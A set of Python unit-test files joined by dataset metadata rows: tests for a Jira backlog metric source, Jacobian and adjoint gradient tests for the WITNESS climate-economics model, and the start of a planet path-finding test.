mock_nr_issues.assert_called_once_with('11', '12')
def test_approved_user_stories(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.approved_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_approved_user_stories_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"approved_user_stories": ['1st {project}', '2nd {project}']})
result = backlog.approved_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_approved_user_stories_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"approved_user_stories": [11, '12']})
result = backlog.approved_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_reviewed_user_stories(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.reviewed_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_reviewed_user_stories_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"reviewed_user_stories": ['1st {project}', '2nd {project}']})
result = backlog.reviewed_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_reviewed_user_stories_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"reviewed_user_stories": [11, '12']})
result = backlog.reviewed_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_reviewed_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.reviewed_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_reviewed_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"reviewed_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.reviewed_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_reviewed_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"reviewed_ltcs": [11, '12']})
result = backlog.reviewed_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_nr_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.nr_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_ltcs": [11, '12']})
result = backlog.nr_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_approved_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.approved_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_approved_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"approved_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.approved_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_approved_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"approved_ltcs": [11, '12']})
result = backlog.approved_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_automated_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_automated_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_nr_automated_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_automated_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.nr_automated_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_automated_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_automated_ltcs": [11, '12']})
result = backlog.nr_automated_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_ltcs_to_be_automated(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_ltcs_to_be_automated()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_nr_ltcs_to_be_automated_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_ltcs_to_be_automated": ['1st {project}', '2nd {project}']})
result = backlog.nr_ltcs_to_be_automated()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_ltcs_to_be_automated_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_ltcs_to_be_automated": [11, '12']})
result = backlog.nr_ltcs_to_be_automated()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_manual_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'Project Name', 'unimportant')
mock_nr_issues.return_value = 1, ['a']
result = backlog.nr_manual_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with(JQL_CONFIG["nr_manual_ltcs"].format(project='Project Name'))
class JiraBacklogPlaceholdersTests(unittest.TestCase):
""" Unit tests for dummy functions """
def test_metric_source_urls(self):
""" Tests that the function correctly formats display url. """
backlog = JiraBacklog('http://url', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(['http://url/issues/?jql=key%20in%20(issue-1)'], backlog.metric_source_urls('issue-1'))
def test_metric_source_urls_many_issues(self):
""" Tests that the function correctly formats display url. """
backlog = JiraBacklog('http://url', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(['http://url/issues/?jql=key%20in%20(issue-1%2Cissue-2)'],
backlog.metric_source_urls('issue-1', 'issue-2'))
def test_date_of_last_manual_test(self):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(datetime.datetime.min, backlog.date_of_last_manual_test())
def test_manual_test_execution_url(self):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual('', backlog.manual_test_execution_url())
def test_nr_manual_ltcs_too_old(self):
""" Tests that the function invokes correct default jql query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
self.assertEqual(-1, backlog.nr_manual_ltcs_too_old('1', 1))
def test_nr_manual_ltcs_too_old_custom(self):
""" Tests that the function invokes correct custom jql query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
self.assertEqual(-1, backlog.nr_manual_ltcs_too_old('1', 1))
def test_nr_manual_ltcs_too_old_custom_filter_number(self):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(-1, backlog.nr_manual_ltcs_too_old('1', 1))
| 55.622159
| 118
| 0.653506
| 2,384
| 19,579
| 5.075503
| 0.07802
| 0.05157
| 0.076364
| 0.059504
| 0.868595
| 0.853554
| 0.831818
| 0.807025
| 0.774463
| 0.754132
| 0
| 0.014967
| 0.204862
| 19,579
| 351
| 119
| 55.780627
| 0.762269
| 0.168241
| 0
| 0.609054
| 0
| 0.004115
| 0.191121
| 0.010351
| 0
| 0
| 0
| 0
| 0.296296
| 1
| 0.152263
| false
| 0.156379
| 0.160494
| 0
| 0.325103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3fbd61336970a5bb420c62ac7c63dfe58c697a0c
| 19,288
|
py
|
Python
|
climateeconomics/tests/utility_tests/_l1_test_gradient_witness_full.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-01-14T06:37:42.000Z
|
2022-01-14T06:37:42.000Z
|
climateeconomics/tests/utility_tests/_l1_test_gradient_witness_full.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
climateeconomics/tests/utility_tests/_l1_test_gradient_witness_full.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from os.path import join, dirname
import numpy as np
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
from climateeconomics.sos_processes.iam.witness.witness.usecase_witness import Study as witness_usecase
from climateeconomics.sos_processes.iam.witness.witness_optim_sub_process.usecase_witness_optim_sub import Study as witness_sub_proc_usecase
class WitnessFullJacobianDiscTest(AbstractJacobianUnittest):
#AbstractJacobianUnittest.DUMP_JACOBIAN = True
obj_const = ['welfare_objective', 'temperature_objective', 'CO2_objective', 'ppm_objective', 'co2_emissions_objective',
'CO2_tax_minus_CO2_damage_constraint_df', 'primary_energies_production', 'CO2_tax_minus_CCS_constraint_df', 'land_demand_constraint_df']
def setUp(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
def analytic_grad_entry(self):
return [
self.test_05_adjoint_with_bsplines,
# self.test_02_gradient_residus_wrt_state_var_on_witness_full,
# self.test_03_gradient_residus_wrt_design_var_on_witness_full,
# self.test_04_gradient_objective_wrt_design_var_on_witness_full
]
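# Note: the DUMP_JACOBIAN flag commented at the top of the class is how
# AbstractJacobianUnittest regenerates the reference pickle files that
# check_jacobian() compares against. A hedged sketch of that workflow
# (assuming the flag behaves as its name suggests):
#     AbstractJacobianUnittest.DUMP_JACOBIAN = True   # dump new reference .pkl files
#     # run the target test once, then set the flag back to False to compare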
def test_01_gradient_objective_wrt_state_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
chain_builders = self.ee.factory.get_builder_from_process(
repo, 'witness')
ns_dict = {'ns_functions': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}',
'ns_public': f'{self.ee.study_name}', }
self.ee.ns_manager.add_ns_def(ns_dict)
self.ee.factory.set_builders_to_coupling_builder(
chain_builders)
self.ee.configure()
usecase = witness_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = {}
for dict_item in usecase.setup_usecase():
values_dict.update(dict_item)
values_dict['Test.epsilon0'] = 1.0
values_dict['Test.tolerance_linear_solver_MDO'] = 1.0e-12
values_dict['Test.linearization_mode'] = 'adjoint'
values_dict['Test.tolerance'] = 1.0e-10
values_dict['Test.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(values_dict)
output_full_names = [f'Test.{obj}' for obj in self.obj_const]
input_full_names = ['Test.EnergyMix.invest_energy_mix',
'Test.CO2_taxes']
self.ee.display_treeview_nodes()
disc = self.ee.root_process
self.check_jacobian(location=dirname(__file__), filename='jacobian_objective_wrt_state_var_on_witness_full.pkl', discipline=disc, inputs=input_full_names,
outputs=output_full_names, derr_approx='complex_step', step=1.0e-12, parallel=True)
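# The derr_approx='complex_step' above checks the adjoint against the
# complex-step derivative, which avoids subtractive cancellation and stays
# accurate to machine precision for analytic functions, hence the tiny steps:
#     f'(x) ~= Im(f(x + i*h)) / h
# A self-contained illustration (independent of this test):
#     import numpy as np
#     f = lambda x: np.exp(x) * np.sin(x)
#     h = 1e-15
#     np.imag(f(2.0 + 1j * h)) / h   # ~= np.exp(2) * (np.sin(2) + np.cos(2))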
def test_02_gradient_residus_wrt_state_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
chain_builders = self.ee.factory.get_builder_from_process(
repo, 'witness')
ns_dict = {'ns_functions': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}',
'ns_public': f'{self.ee.study_name}', }
self.ee.ns_manager.add_ns_def(ns_dict)
self.ee.factory.set_builders_to_coupling_builder(
chain_builders)
self.ee.configure()
usecase = witness_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = {}
for dict_item in usecase.setup_usecase():
values_dict.update(dict_item)
values_dict['Test.epsilon0'] = 1.0
values_dict['Test.tolerance_linear_solver_MDO'] = 1.0e-8
values_dict['Test.linearization_mode'] = 'adjoint'
values_dict['Test.tolerance'] = 1.0e-10
values_dict['Test.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(values_dict)
disc = self.ee.root_process
output_full_names = ['Test.temperature_df', 'Test.utility_df', 'Test.economics_df',
'Test.carboncycle_df', 'Test.CO2_emissions_df', 'Test.damage_df', 'Test.EnergyMix.energy_production', 'Test.EnergyMix.energy_investment', 'Test.EnergyMix.co2_emissions_Gt', 'Test.EnergyMix.energy_mean_price']
input_full_names = ['Test.EnergyMix.invest_energy_mix',
'Test.CO2_taxes']
input_full_names.extend(
[f'Test.EnergyMix.{energy}.invest_techno_mix' for energy in usecase.energy_list])
self.check_jacobian(location=dirname(__file__), filename='jacobian_residus_wrt_state_var_on_witness_full.pkl', discipline=disc, inputs=input_full_names,
outputs=output_full_names, derr_approx='complex_step', step=1.0e-15, parallel=True)
def test_03_gradient_residus_wrt_design_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
coupling_name = "WITNESS_Eval"
designvariable_name = "DesignVariables"
func_manager_name = "FunctionsManager"
extra_name = 'WITNESS'
# retrieve energy process
chain_builders = self.ee.factory.get_builder_from_process(
'climateeconomics.sos_processes.iam.witness', 'witness')
# modify namespaces defined in the child process
self.ee.ns_manager.update_namespace_list_with_extra_ns(
extra_name, after_name=self.ee.study_name)
self.ee.factory.update_builder_list_with_extra_name(
extra_name, builder_list=chain_builders)
# design variables builder
design_var_path = 'climateeconomics.core.design_variables_translation.witness.design_var_disc.Design_Var_Discipline'
design_var_builder = self.ee.factory.get_builder_from_module(
f'{designvariable_name}', design_var_path)
chain_builders.append(design_var_builder)
# # function manager builder
# fmanager_path = 'sos_trades_core.execution_engine.func_manager.func_manager_disc.FunctionManagerDisc'
# fmanager_builder = self.ee.factory.get_builder_from_module(
# f'{func_manager_name}', fmanager_path)
# chain_builders.append(fmanager_builder)
# modify namespaces defined in the child process
for ns in self.ee.ns_manager.ns_list:
self.ee.ns_manager.update_namespace_with_extra_ns(
ns, coupling_name, after_name=self.ee.study_name)
ns_dict = {'ns_functions': f'{self.ee.study_name}.{coupling_name}.{extra_name}',
'ns_public': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}'}
self.ee.ns_manager.add_ns_def(ns_dict)
# create coupling builder
coupling_builder = self.ee.factory.create_builder_coupling(
coupling_name)
coupling_builder.set_builder_info('cls_builder', chain_builders)
coupling_builder.set_builder_info('with_data_io', True)
self.ee.factory.set_builders_to_coupling_builder(coupling_builder)
self.ee.configure()
usecase = witness_sub_proc_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDO_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDA_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linearization_mode'] = 'adjoint'
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.tolerance'] = 1.0e-12
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.max_mda_iter'] = 200
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(full_values_dict)
disc = self.ee.root_process.sos_disciplines[0]
namespace = 'Test.WITNESS_Eval.WITNESS'
output_full_names = [f'{namespace}.temperature_df', f'{namespace}.utility_df', f'{namespace}.economics_df',
f'{namespace}.carboncycle_df', f'{namespace}.CO2_emissions_df', f'{namespace}.damage_df',
f'{namespace}.EnergyMix.energy_production', f'{namespace}.EnergyMix.energy_investment',
f'{namespace}.EnergyMix.co2_emissions_Gt', f'{namespace}.EnergyMix.energy_mean_price',
f'{namespace}.CO2_objective', f'{namespace}.ppm_objective',
f'{namespace}.temperature_objective', f'{namespace}.CO2_tax_minus_CO2_damage_constraint_df', f'{namespace}.CO2_tax_minus_CCS_constraint_df']
self.ee.display_treeview_nodes(display_variables=True)
# input_full_names = ['Test.WITNESS_Eval.CO2_taxes_array']
# for energy in full_values_dict[f'{self.name}.WITNESS_Eval.energy_list']:
# energy_wo_dot = energy.replace('.', '_')
# input_full_names.append(
# f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{energy_wo_dot}_array_mix')
# for technology in full_values_dict[f'Test.WITNESS_Eval.EnergyMix.{energy}.technologies_list']:
# technology_wo_dot = technology.replace('.', '_')
# input_full_names.append(
# f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{technology}.{energy_wo_dot}_{technology_wo_dot}_array_mix')
self.check_jacobian(location=dirname(__file__), filename='jacobian_residus_wrt_design_var_on_witness_full.pkl', discipline=disc, inputs=[f'{namespace}.EnergyMix.electricity.CoalGen.electricity_CoalGen_array_mix',
f'{namespace}.EnergyMix.liquid_fuel.Refinery.liquid_fuel_Refinery_array_mix',
f'{namespace}.CO2_taxes_array'],
outputs=output_full_names, derr_approx='complex_step', step=1.0e-15, parallel=True)
def test_04_gradient_objective_wrt_design_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
builder = self.ee.factory.get_builder_from_process(
'climateeconomics.sos_processes.iam.witness', 'witness_optim_sub_process')
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
usecase = witness_sub_proc_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
full_values_dict['Test.epsilon0'] = 1.0
# 1.0e-12
full_values_dict['Test.WITNESS_Eval.tolerance_linear_solver_MDO'] = 1.0e-8
full_values_dict['Test.WITNESS_Eval.linearization_mode'] = 'adjoint'
full_values_dict['Test.WITNESS_Eval.tolerance'] = 1.0e-10
full_values_dict['Test.WITNESS_Eval.warm_start'] = False
full_values_dict['Test.WITNESS_Eval.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(full_values_dict)
disc = self.ee.root_process.sos_disciplines[0]
output_full_names = [
f'Test.WITNESS_Eval.{obj}' for obj in self.obj_const]
input_full_names = ['Test.WITNESS_Eval.CO2_taxes_array']
for energy in full_values_dict[f'{self.name}.WITNESS_Eval.energy_list']:
energy_wo_dot = energy.replace('.', '_')
input_full_names.append(
f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{energy_wo_dot}_array_mix')
# for technology in full_values_dict[f'Test.WITNESS_Eval.EnergyMix.{energy}.technologies_list']:
# technology_wo_dot = technology.replace('.', '_')
# input_full_names.append(
# f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{technology}.{energy_wo_dot}_{technology_wo_dot}_array_mix')
self.check_jacobian(location=dirname(__file__), filename='jacobian_objective_wrt_design_var_on_witness_full.pkl', discipline=disc,
step=1.0e-15, derr_approx='complex_step', threshold=1e-5,
inputs=input_full_names,
outputs=output_full_names, parallel=True)
def test_05_adjoint_with_bsplines(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
coupling_name = "WITNESS_Eval"
designvariable_name = "DesignVariables"
extra_name = 'WITNESS'
# retrieve energy process
chain_builders = self.ee.factory.get_builder_from_process(
'climateeconomics.sos_processes.iam.witness', 'witness')
# modify namespaces defined in the child process
self.ee.ns_manager.update_namespace_list_with_extra_ns(
extra_name, after_name=self.ee.study_name)
self.ee.factory.update_builder_list_with_extra_name(
extra_name, builder_list=chain_builders)
# design variables builder
design_var_path = 'climateeconomics.core.design_variables_translation.witness_bspline.design_var_disc.Design_Var_Discipline'
design_var_builder = self.ee.factory.get_builder_from_module(
f'{designvariable_name}', design_var_path)
chain_builders.append(design_var_builder)
# # function manager builder
# fmanager_path = 'sos_trades_core.execution_engine.func_manager.func_manager_disc.FunctionManagerDisc'
# fmanager_builder = self.ee.factory.get_builder_from_module(
# f'{func_manager_name}', fmanager_path)
# chain_builders.append(fmanager_builder)
# modify namespaces defined in the child process
for ns in self.ee.ns_manager.ns_list:
self.ee.ns_manager.update_namespace_with_extra_ns(
ns, coupling_name, after_name=self.ee.study_name)
ns_dict = {'ns_functions': f'{self.ee.study_name}.{coupling_name}.{extra_name}',
'ns_public': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}'}
self.ee.ns_manager.add_ns_def(ns_dict)
# create coupling builder
coupling_builder = self.ee.factory.create_builder_coupling(
coupling_name)
coupling_builder.set_builder_info('cls_builder', chain_builders)
coupling_builder.set_builder_info('with_data_io', True)
self.ee.factory.set_builders_to_coupling_builder(coupling_builder)
self.ee.configure()
usecase = witness_sub_proc_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDO_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDA_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linearization_mode'] = 'adjoint'
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.tolerance'] = 1.0e-12
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.max_mda_iter'] = 200
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.sub_mda_class'] = 'MDAGaussSeidel'
input_full_names = ['Test.WITNESS_Eval.WITNESS.CO2_taxes_array']
nb_poles = 5
for energy in full_values_dict[f'{self.name}.WITNESS_Eval.WITNESS.energy_list']:
energy_wo_dot = energy.replace('.', '_')
input_name = f'{self.name}.WITNESS_Eval.WITNESS.EnergyMix.{energy}.{energy_wo_dot}_array_mix'
input_full_names.append(input_name)
full_values_dict[input_name] = np.linspace(1, 2, nb_poles)
for technology in full_values_dict[f'{self.name}.WITNESS_Eval.WITNESS.EnergyMix.{energy}.technologies_list']:
technology_wo_dot = technology.replace('.', '_')
input_name = f'{self.name}.WITNESS_Eval.WITNESS.EnergyMix.{energy}.{technology}.{energy_wo_dot}_{technology_wo_dot}_array_mix'
input_full_names.append(input_name)
full_values_dict[input_name] = np.linspace(3, 4, nb_poles)
self.ee.load_study_from_input_dict(full_values_dict)
disc = self.ee.root_process.sos_disciplines[0]
namespace = 'Test.WITNESS_Eval.WITNESS'
output_full_names = [f'{namespace}.temperature_df', f'{namespace}.utility_df', f'{namespace}.economics_df',
f'{namespace}.carboncycle_df', f'{namespace}.CO2_emissions_df', f'{namespace}.damage_df',
f'{namespace}.EnergyMix.energy_production', f'{namespace}.EnergyMix.energy_investment',
f'{namespace}.EnergyMix.co2_emissions_Gt', f'{namespace}.EnergyMix.energy_mean_price',
f'{namespace}.CO2_objective', f'{namespace}.ppm_objective', f'{namespace}.utility_objective',
f'{namespace}.temperature_objective', f'{namespace}.CO2_tax_minus_CO2_damage_constraint_df', f'{namespace}.CO2_tax_minus_CCS_constraint_df']
self.ee.display_treeview_nodes(display_variables=True)
self.check_jacobian(location=dirname(__file__), filename='jacobian_adjoint_with_bsplines_witness_full.pkl', discipline=disc, inputs=input_full_names,
outputs=output_full_names, derr_approx='complex_step', step=1.0e-15, parallel=True)
if __name__ == '__main__':
cls = WitnessFullJacobianDiscTest()
cls.test_05_adjoint_with_bsplines()
| 51.710456
| 237
| 0.669484
| 2,375
| 19,288
| 5.045474
| 0.112842
| 0.036552
| 0.040891
| 0.022532
| 0.858466
| 0.846533
| 0.829926
| 0.811817
| 0.798047
| 0.777101
| 0
| 0.011335
| 0.231595
| 19,288
| 372
| 238
| 51.849462
| 0.79718
| 0.141124
| 0
| 0.708333
| 0
| 0.004167
| 0.292875
| 0.233004
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029167
| false
| 0
| 0.025
| 0.004167
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b74fa469cc23fa734f42613a3cb5f1997f47ba8a
| 13,639
|
py
|
Python
|
src/planettest.py
|
tillgr/robolab
|
67acad1ba7731c69b113a93ab737a4389e3e62cf
|
[
"MIT"
] | null | null | null |
src/planettest.py
|
tillgr/robolab
|
67acad1ba7731c69b113a93ab737a4389e3e62cf
|
[
"MIT"
] | null | null | null |
src/planettest.py
|
tillgr/robolab
|
67acad1ba7731c69b113a93ab737a4389e3e62cf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import unittest
from planet import Direction, Planet
import pprint
class ExampleTestPlanet(unittest.TestCase):
def setUp(self):
"""
Instantiates the planet data structure and fills it with paths
example planet:
+--+
| |
+-0,3------+
| |
0,2-----2,2 (target)
| /
+-0,1 /
| | /
+-0,0-1,0
|
(start)
"""
# set your data structure
self.planet = Planet()
# add the paths
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 1), Direction.WEST), ((0, 0), Direction.WEST), 1)
#def test_target_not_reachable_with_loop(self):
# does the shortest path algorithm loop infinitely?
# there is no shortest path
# self.assertIsNone(self.planet.shortest_path((0, 0), (1, 2)))
class YourFirstTestPlanet(unittest.TestCase):
def setUp(self):
"""
